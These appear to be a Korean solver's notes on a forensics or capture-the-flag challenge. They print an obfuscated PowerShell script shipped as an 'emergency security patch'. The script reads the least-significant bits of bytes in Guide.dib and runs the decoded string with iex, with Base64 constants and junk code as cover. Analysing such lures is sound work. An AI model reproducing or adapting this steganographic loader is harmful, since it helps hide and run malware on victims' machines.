묘하게 덤프 파일에 아무것도 없음
LSB니까 이미지 파일이었으면 좋겠다
사내 긴급 보안 패치
patch_guide.zip
2024-08-10 08:10 ~~
powershell.ps1
$wqeiuyorczxasdkfjhz23xb = "MTgzMDQ="
$wqei1u16yorczxasdkfjhz23xb = "MzA="
$wqei1xca16yorczxasdkfjhz23xb = "MA=="
$aqeuijfnbzcxuiv = "OA=="
$uqiwebuibzxcuyb = [System.Convert]::ToInt32([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($wqeiuyorczxasdkfjhz23xb)))
$zeqwbeuibyxuygb = [System.Convert]::ToInt32([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($wqei1u16yorczxasdkfjhz23xb)))
$qdwcyvbaztyfuqwehvg = [System.Convert]::ToInt32([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($wqei1xca16yorczxasdkfjhz23xb)))
$zy3evbzqvwtg487asgb = [System.Convert]::ToInt32([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($aqeuijfnbzcxuiv)))
$aefnmlksadasdkljfqewornzxc = [System.Convert]::FromBase64String("R3VpZGUuZGli")
$wqeiuyorczxasdkfjhzxbme = [System.Text.Encoding]::ASCII.GetString($aefnmlksadasdkljfqewornzxc)
$QxDrTjYnMvLpHsKjRbWfNgZcVxSbQxWpHfJz = Join-Path (Get-Location).Path $wqeiuyorczxasdkfjhzxbme
$PkVmJnLdQzThPwYsNcXfLuRsWvCdGmJbZtRp = [System.IO.File]::ReadAllBytes($QxDrTjYnMvLpHsKjRbWfNgZcVxSbQxWpHfJz)
$JbPfQrHlMkZsBxCyNdWhGtQxLuVtRqYpWtXp = [math]::sqrt(3025)
$NcYpQzVtFrJdLhSkWtMxKvGsRhCtNxWpQsBd = [math]::log10(10) * 10
$XrBnCdVwYsQtJkWzPrLpMfSnThXvGjRmYqVk = [math]::abs(-1 + 2)
$QrJtFvNpBwXsLnKgUvHpRcMzLkYvGtTzScXf = [math]::round([math]::PI)
$LmWtZxVpQjTsCnRyMvLpJkNxSrUtGhHfRcKs = ($JbPfQrHlMkZsBxCyNdWhGtQxLuVtRqYpWtXp * $XrBnCdVwYsQtJkWzPrLpMfSnThXvGjRmYqVk) + ($QrJtFvNpBwXsLnKgUvHpRcMzLkYvGtTzScXf * $NcYpQzVtFrJdLhSkWtMxKvGsRhCtNxWpQsBd) - $zeqwbeuibyxuygb
$MpQsBnLjHtVrXpWdNgZkTqScRmVlPyKtWhXc = New-Object System.Collections.ArrayList
$WcTfDrGpLxJvNzMkQsYrPtVcHwBmZnKsVnRq = $qdwcyvbaztyfuqwehvg
$HtRfGpLkNqMwXsPtVzYjLpScXrJwNmTpYvQr = $qdwcyvbaztyfuqwehvg
for ($LpWqXtNzJsVcKfRvQpTdBvGhXcJkMtWrXf = $LmWtZxVpQjTsCnRyMvLpJkNxSrUtGhHfRcKs; $LpWqXtNzJsVcKfRvQpTdBvGhXcJkMtWrXf -lt $uqiwebuibzxcuyb; $LpWqXtNzJsVcKfRvQpTdBvGhXcJkMtWrXf++) {
$GxJnQfLkBsWrNzMpCtHyVwXkTpZyQjPtCr = $PkVmJnLdQzThPwYsNcXfLuRsWvCdGmJbZtRp[$LpWqXtNzJsVcKfRvQpTdBvGhXcJkMtWrXf] -band 1
$WcTfDrGpLxJvNzMkQsYrPtVcHwBmZnKsVnRq = $WcTfDrGpLxJvNzMkQsYrPtVcHwBmZnKsVnRq -bor ($GxJnQfLkBsWrNzMpCtHyVwXkTpZyQjPtCr * [Math]::Pow(2, $HtRfGpLkNqMwXsPtVzYjLpScXrJwNmTpYvQr))
$HtRfGpLkNqMwXsPtVzYjLpScXrJwNmTpYvQr++
if ($HtRfGpLkNqMwXsPtVzYjLpScXrJwNmTpYvQr -eq $zy3evbzqvwtg487asgb) {
if ($WcTfDrGpLxJvNzMkQsYrPtVcHwBmZnKsVnRq -eq $qdwcyvbaztyfuqwehvg) {
break
}
[void]$MpQsBnLjHtVrXpWdNgZkTqScRmVlPyKtWhXc.Add([byte]$WcTfDrGpLxJvNzMkQsYrPtVcHwBmZnKsVnRq)
$WcTfDrGpLxJvNzMkQsYrPtVcHwBmZnKsVnRq = $qdwcyvbaztyfuqwehvg
$HtRfGpLkNqMwXsPtVzYjLpScXrJwNmTpYvQr = $qdwcyvbaztyfuqwehvg
}
}
$HfDrQxJsWzKpLtVgXpYtMnCjPkZfVrYsLcGh = [System.Text.Encoding]::ASCII.GetString($MpQsBnLjHtVrXpWdNgZkTqScRmVlPyKtWhXc.ToArray())
iex $HfDrQxJsWzKpLtVgXpYtMnCjPkZfVrYsLcGh
$dfgAeJKLfgswERTfgjkl12 = "MA=="
$poiNMBcfgdqwerYxsdflq1 = [System.Convert]::ToInt32([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($dfgAeJKLfgswERTfgjkl12)))
$poiASDfgqerdfdseN1 = [math]::sqrt(1024)
$wertqweOPhgdfgdkl3 = [System.Convert]::FromBase64String("UG93ZXJTaGVsbA==")
$tyuIQWERTzxcfderq0 = [System.Text.Encoding]::ASCII.GetString($wertqweOPhgdfgdkl3)
if ($poiNMBcfgdqwerYxsdflq1 -eq $poiNMBcfgdqwerYxsdflq1) {
$nmiHgTPOlkjyewrflp4 = $poiASDfgqerdfdseN1 + $poiNMBcfgdqwerYxsdflq1
}
$lkjSDfghUErtqweIOPh1 = "V2VsY29tZQ=="
$ghkZXCVgqwqerQWERTzx2 = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($lkjSDfghUErtqweIOPh1))
for ($zxcvTREWSADfghJKLre3 = $poiNMBcfgdqwerYxsdflq1; $zxcvTREWSADfghJKLre3 -lt $nmiHgTPOlkjyewrflp4; $zxcvTREWSADfghJKLre3++) {
$jkLOIUmnhQWEfghZxcvb4 = $poiNMBcfgdqwerYxsdflq1 * $zxcvTREWSADfghJKLre3
}
$werERTOIUyNMBdfqwefp5 = [System.Convert]::FromBase64String("U2NyaXB0IGhhcyBlbmRlZCBleGVjdXRpb24=")
$zxcMNBAsdfwerXCVbnlk3 = [System.Text.Encoding]::ASCII.GetString($werERTOIUyNMBdfqwefp5)
결국 난독화된 powershell 분석 문제군…